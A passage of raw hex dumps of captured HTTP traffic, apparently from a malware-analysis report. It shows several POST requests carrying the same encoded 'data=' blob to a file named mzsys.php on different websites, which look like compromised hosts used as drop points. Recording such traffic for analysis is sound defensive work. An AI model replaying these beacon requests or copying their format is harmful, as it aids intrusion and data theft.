0x000001b0 (00432)   37373342 46463834 42434137 33314331   773BFF84BCA731C1
0x000001c0 (00448)   33413745 32333139 36373045 45324139   3A7E2319670EE2A9
0x000001d0 (00464)   44394238 44464231 41314244 35313741   D9B8DFB1A1BD517A
0x000001e0 (00480)   39413534 33384443 46313038 33373630   9A5438DCF1083760
0x000001f0 (00496)   43424444 34434536 42434139 31333641   CBDD4CE6BCA9136A
0x00000200 (00512)   46353539 44463444 45333234 31424443   F559DF4DE3241BDC
0x00000210 (00528)   34373641 44334344 37463145 30363735   476AD3CD7F1E0675
0x00000220 (00544)   39303236 45464334 46444642 46384532   9026EFC4FDFBF8E2
0x00000230 (00560)   43313636 39373244 44353339 32394332   C166972DD53929C2
0x00000240 (00576)   39434432 35343135 45433335 36303839   9CD25415EC356089
0x00000250 (00592)   36393944 33323230 41313235 32394443   699D3220A12529DC
0x00000260 (00608)   35313632 44373334 34374539 35394131   5162D73447E959A1
0x00000270 (00624)   36303933 36383345 37414343 32444241   6093683E7ACC2DBA
0x00000280 (00640)   39314343 39443846 41383731 30454433   91CC9D8FA8710ED3
0x00000290 (00656)   31414536 37304238 41364342 46353638   1AE670B8A6CBF568
0x000002a0 (00672)   37313142 39433246 39384432 39433932   711B9C2F98D29C92
0x000002b0 (00688)   34323631 45463446 32433042 43333031   4261EF4F2C0BC301
0x000002c0 (00704)   39393737 46463736 44373746 33343233   9977FF76D77F3423
0x000002d0 (00720)   34443841 38313843 38354445 34434134   4D8A818C85DE4CA4
0x000002e0 (00736)   36334234 30453346 33323038 42303339   63B40E3F3208B039
0x000002f0 (00752)   42414142 31393341 44373633 34373338   BAAB193AD7634738
0x00000300 (00768)   34353039 33304536 43444132 38464233   450930E6CDA28FB3
0x00000310 (00784)   38343034 43303833 34313832 38373936   8404C08341828796
0x00000320 (00800)   31323533 33333546 38363836 46414143   1253335F8686FAAC
0x00000330 (00816)   41303436 34414246 42393837 44464342   A0464ABFB987DFCB
0x00000340 (00832)   31363945 35353330 37464437 37383346   169E55307FD7783F
0x00000350 (00848)   39333031 38363133 37364346 30393142   9301861376CF091B
0x00000360 (00864)   31424536 36323230 34313736 43453933   1BE662204176CE93
0x00000370 (00880)   38453831 46373543 42373337 46444531   8E81F75CB737FDE1
0x00000380 (00896)   36343742 46303139 43463544 39384439   647BF019CF5D98D9
0x00000390 (00912)   39323941 44353841 42324344 42303239   929AD58AB2CDB029
0x000003a0 (00928)   46454431 46434230 34324635 39433542   FED1FCB042F59C5B
0x000003b0 (00944)   30423133 33373732 36424433 36424433   0B1337726BD36BD3
0x000003c0 (00960)   50fd9a                                P..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000030 (00048)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000060 (00096)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000070 (00112)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000080 (00128)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x00000090 (00144)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000a0 (00160)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000b0 (00176)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000c0 (00192)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000d0 (00208)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000e0 (00224)   486f7374 3a206368 6f6e6275 7269636f   Host: chonburico
0x000000f0 (00240)   6f702e6e 65740d0a 436f6e74 656e742d   op.net..Content-
0x00000100 (00256)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000110 (00272)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000120 (00288)   61636865 0d0a0d0a 64617461 3d323934   ache....data=294
0x00000130 (00304)   44463130 36373843 32363437 38313143   DF10678C2647811C
0x00000140 (00320)   36393235 35383841 35433236 35413345   6925588A5C265A3E
0x00000150 (00336)   35303135 30323039 39333533 39313438   5015020993539148
0x00000160 (00352)   34424242 35353046 41334537 35434535   4BBB550FA3E75CE5
0x00000170 (00368)   34413546 30394233 37434142 44453435   4A5F09B37CABDE45
0x00000180 (00384)   36414131 35434639 42374143 43303736   6AA15CF9B7ACC076
0x00000190 (00400)   37393031 44363631 44344234 33323441   7901D661D4B4324A
0x000001a0 (00416)   44373733 42464638 34424341 37333143   D773BFF84BCA731C
0x000001b0 (00432)   31334137 45323331 39363730 45453241   13A7E2319670EE2A
0x000001c0 (00448)   39443942 38444642 31413142 44353137   9D9B8DFB1A1BD517
0x000001d0 (00464)   41394135 34333844 43463130 38333736   A9A5438DCF108376
0x000001e0 (00480)   30434244 44344345 36424341 39313336   0CBDD4CE6BCA9136
0x000001f0 (00496)   41463535 39444634 44453332 34314244   AF559DF4DE3241BD
0x00000200 (00512)   43343736 41443343 44374631 45303637   C476AD3CD7F1E067
0x00000210 (00528)   35393032 36454643 34464446 42463845   59026EFC4FDFBF8E
0x00000220 (00544)   32433136 36393732 44443533 39323943   2C166972DD53929C
0x00000230 (00560)   32394344 32353431 35454333 35363038   29CD25415EC35608
0x00000240 (00576)   39363939 44333232 30413132 35323944   9699D3220A12529D
0x00000250 (00592)   43353136 32443733 34343745 39353941   C5162D73447E959A
0x00000260 (00608)   31363039 33363833 45374143 43324442   16093683E7ACC2DB
0x00000270 (00624)   41393143 43394438 46413837 31304544   A91CC9D8FA8710ED
0x00000280 (00640)   33314145 36373042 38413643 42463536   31AE670B8A6CBF56
0x00000290 (00656)   38373131 42394332 46393844 32394339   8711B9C2F98D29C9
0x000002a0 (00672)   32343236 31454634 46324330 42433330   24261EF4F2C0BC30
0x000002b0 (00688)   31393937 37464637 36443737 46333432   19977FF76D77F342
0x000002c0 (00704)   33344438 41383138 43383544 45344341   34D8A818C85DE4CA
0x000002d0 (00720)   34363342 34304533 46333230 38423033   463B40E3F3208B03
0x000002e0 (00736)   39424141 42313933 41443736 33343733   9BAAB193AD763473
0x000002f0 (00752)   38343530 39333045 36434441 32384642   8450930E6CDA28FB
0x00000300 (00768)   33383430 34433038 33343138 32383739   38404C0834182879
0x00000310 (00784)   36313235 33333335 46383638 36464141   61253335F8686FAA
0x00000320 (00800)   43413034 36344142 46423938 37444643   CA0464ABFB987DFC
0x00000330 (00816)   42313639 45353533 30374644 37373833   B169E55307FD7783
0x00000340 (00832)   46393330 31383631 33373643 46303931   F9301861376CF091
0x00000350 (00848)   42314245 36363232 30343137 36434539   B1BE662204176CE9
0x00000360 (00864)   33384538 31463735 43423733 37464445   38E81F75CB737FDE
0x00000370 (00880)   31363437 42463031 39434635 44393844   1647BF019CF5D98D
0x00000380 (00896)   39393239 41443538 41423243 44423032   9929AD58AB2CDB02
0x00000390 (00912)   39464544 31464342 30343246 35394335   9FED1FCB042F59C5
0x000003a0 (00928)   42304231 33333737 32364244 33433542   B0B1337726BD3C5B
0x000003b0 (00944)   30423133 33373732 36424433 36424433   0B1337726BD36BD3
0x000003c0 (00960)   50fd9a                                P..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202c 202c202c 202c202c 202c202c   t: , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000080 (00128)   200d0a43 6f6e7465 6e742d54 7970653a    ..Content-Type:
0x00000090 (00144)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x000000a0 (00160)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x000000b0 (00176)   65640d0a 55736572 2d416765 6e743a20   ed..User-Agent: 
0x000000c0 (00192)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x000000d0 (00208)   646f7773 204e5420 362e333b 20574f57   dows NT 6.3; WOW
0x000000e0 (00224)   36343b20 54726964 656e742f 372e303b   64; Trident/7.0;
0x000000f0 (00240)   20546f75 63683b20 72763a31 312e3029    Touch; rv:11.0)
0x00000100 (00256)   206c696b 65204765 636b6f0d 0a486f73    like Gecko..Hos
0x00000110 (00272)   743a2070 6173736c 6966742e 636f6d0d   t: passlift.com.
0x00000120 (00288)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000130 (00304)   20363435 0d0a4361 6368652d 436f6e74    645..Cache-Cont
0x00000140 (00320)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000150 (00336)   0a646174 613d3239 34444631 30363738   .data=294DF10678
0x00000160 (00352)   43323634 37383131 43363932 35353838   C2647811C6925588
0x00000170 (00368)   41354332 36354133 45353031 35303230   A5C265A3E5015020
0x00000180 (00384)   39393335 33393134 38344242 42353530   9935391484BBB550
0x00000190 (00400)   46413345 37354345 35344135 46303942   FA3E75CE54A5F09B
0x000001a0 (00416)   33374341 42444534 35364141 31354346   37CABDE456AA15CF
0x000001b0 (00432)   39423741 43433037 36373930 31443636   9B7ACC0767901D66
0x000001c0 (00448)   31443442 34333234 41443737 33424646   1D4B4324AD773BFF
0x000001d0 (00464)   38344243 41373331 43313341 37453233   84BCA731C13A7E23
0x000001e0 (00480)   31393637 30454532 41394439 42384446   19670EE2A9D9B8DF
0x000001f0 (00496)   42314131 42443531 37413941 35343338   B1A1BD517A9A5438
0x00000200 (00512)   44434631 30383337 36304342 44443443   DCF1083760CBDD4C
0x00000210 (00528)   45364243 41393133 36414635 35394446   E6BCA9136AF559DF
0x00000220 (00544)   34444533 32343142 44433437 36414433   4DE3241BDC476AD3
0x00000230 (00560)   43443746 31453036 37353930 32364546   CD7F1E06759026EF
0x00000240 (00576)   43344644 46424638 45324331 36363937   C4FDFBF8E2C16697
0x00000250 (00592)   32444435 33393239 43323943 44323534   2DD53929C29CD254
0x00000260 (00608)   31354543 33353630 38393639 39443332   15EC356089699D32
0x00000270 (00624)   32304131 32353239 44433531 36324437   20A12529DC5162D7
0x00000280 (00640)   33343437 45393539 41313630 39333638   3447E959A1609368
0x00000290 (00656)   33453741 43433244 42413931 43433944   3E7ACC2DBA91CC9D
0x000002a0 (00672)   38464138 37313045 44333141 45363730   8FA8710ED31AE670
0x000002b0 (00688)   42384136 43424635 36383731 31423943   B8A6CBF568711B9C
0x000002c0 (00704)   32463938 44323943 39323432 36314546   2F98D29C924261EF
0x000002d0 (00720)   34463243 30424333 30313939 37374646   4F2C0BC3019977FF
0x000002e0 (00736)   37364437 37463334 32333444 38413831   76D77F34234D8A81
0x000002f0 (00752)   38433835 44453443 41343633 42343045   8C85DE4CA463B40E
0x00000300 (00768)   33463332 30384230 33394241 41423139   3F3208B039BAAB19
0x00000310 (00784)   33414437 36333437 33383435 30393330   3AD7634738450930
0x00000320 (00800)   45364344 41323846 42333834 30344330   E6CDA28FB38404C0
0x00000330 (00816)   38333431 38323837 39363132 35333333   8341828796125333
0x00000340 (00832)   35463836 38364641 41434130 34363441   5F8686FAACA0464A
0x00000350 (00848)   42464239 38374446 43423136 39453535   BFB987DFCB169E55
0x00000360 (00864)   33303746 44373738 33463933 30313836   307FD7783F930186
0x00000370 (00880)   31333736 43463039 31423142 45363632   1376CF091B1BE662
0x00000380 (00896)   32303431 37364345 39333845 38314637   204176CE938E81F7
0x00000390 (00912)   35434237 33374644 45313634 37424630   5CB737FDE1647BF0
0x000003a0 (00928)   31394346 35443938 44393932 39414435   19CF5D98D9929AD5
0x000003b0 (00944)   38414232 43444230 32394645 44314643   8AB2CDB029FED1FC
0x000003c0 (00960)   42303432 46353943 35423042 31333337   B042F59C5B0B1337
0x000003d0 (00976)   37323642 4433                         726BD3

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000060 (00096)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000070 (00112)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000080 (00128)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000090 (00144)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000a0 (00160)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000b0 (00176)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000c0 (00192)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000d0 (00208)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000e0 (00224)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000f0 (00240)   486f7374 3a206163 74696f6e 706f7572   Host: actionpour
0x00000100 (00256)   69737261 656c2e63 6f6d0d0a 436f6e74   israel.com..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d323934 44463130 36373843 32363437   =294DF10678C2647
0x00000150 (00336)   38313143 36393235 35383841 35433236   811C6925588A5C26
0x00000160 (00352)   35413345 35303135 30323039 39333533   5A3E501502099353
0x00000170 (00368)   39313438 34424242 35353046 41334537   91484BBB550FA3E7
0x00000180 (00384)   35434535 34413546 30394233 37434142   5CE54A5F09B37CAB
0x00000190 (00400)   44453435 36414131 35434639 42374143   DE456AA15CF9B7AC
0x000001a0 (00416)   43303736 37393031 44363631 44344234   C0767901D661D4B4
0x000001b0 (00432)   33323441 44373733 42464638 34424341   324AD773BFF84BCA
0x000001c0 (00448)   37333143 31334137 45323331 39363730   731C13A7E2319670
0x000001d0 (00464)   45453241 39443942 38444642 31413142   EE2A9D9B8DFB1A1B
0x000001e0 (00480)   44353137 41394135 34333844 43463130   D517A9A5438DCF10
0x000001f0 (00496)   38333736 30434244 44344345 36424341   83760CBDD4CE6BCA
0x00000200 (00512)   39313336 41463535 39444634 44453332   9136AF559DF4DE32
0x00000210 (00528)   34314244 43343736 41443343 44374631   41BDC476AD3CD7F1
0x00000220 (00544)   45303637 35393032 36454643 34464446   E06759026EFC4FDF
0x00000230 (00560)   42463845 32433136 36393732 44443533   BF8E2C166972DD53
0x00000240 (00576)   39323943 32394344 32353431 35454333   929C29CD25415EC3
0x00000250 (00592)   35363038 39363939 44333232 30413132   56089699D3220A12
0x00000260 (00608)   35323944 43353136 32443733 34343745   529DC5162D73447E
0x00000270 (00624)   39353941 31363039 33363833 45374143   959A16093683E7AC
0x00000280 (00640)   43324442 41393143 43394438 46413837   C2DBA91CC9D8FA87
0x00000290 (00656)   31304544 33314145 36373042 38413643   10ED31AE670B8A6C
0x000002a0 (00672)   42463536 38373131 42394332 46393844   BF568711B9C2F98D
0x000002b0 (00688)   32394339 32343236 31454634 46324330   29C924261EF4F2C0
0x000002c0 (00704)   42433330 31393937 37464637 36443737   BC3019977FF76D77
0x000002d0 (00720)   46333432 33344438 41383138 43383544   F34234D8A818C85D
0x000002e0 (00736)   45344341 34363342 34304533 46333230   E4CA463B40E3F320
0x000002f0 (00752)   38423033 39424141 42313933 41443736   8B039BAAB193AD76
0x00000300 (00768)   33343733 38343530 39333045 36434441   34738450930E6CDA
0x00000310 (00784)   32384642 33383430 34433038 33343138   28FB38404C083418
0x00000320 (00800)   32383739 36313235 33333335 46383638   287961253335F868
0x00000330 (00816)   36464141 43413034 36344142 46423938   6FAACA0464ABFB98
0x00000340 (00832)   37444643 42313639 45353533 30374644   7DFCB169E55307FD
0x00000350 (00848)   37373833 46393330 31383631 33373643   7783F9301861376C
0x00000360 (00864)   46303931 42314245 36363232 30343137   F091B1BE66220417
0x00000370 (00880)   36434539 33384538 31463735 43423733   6CE938E81F75CB73
0x00000380 (00896)   37464445 31363437 42463031 39434635   7FDE1647BF019CF5
0x00000390 (00912)   44393844 39393239 41443538 41423243   D98D9929AD58AB2C
0x000003a0 (00928)   44423032 39464544 31464342 30343246   DB029FED1FCB042F
0x000003b0 (00944)   35394335 42304231 33333737 32364244   59C5B0B1337726BD
0x000003c0 (00960)   33303432 46353943 35423042 31333337   3042F59C5B0B1337
0x000003d0 (00976)   37323642 4433                         726BD3


Strings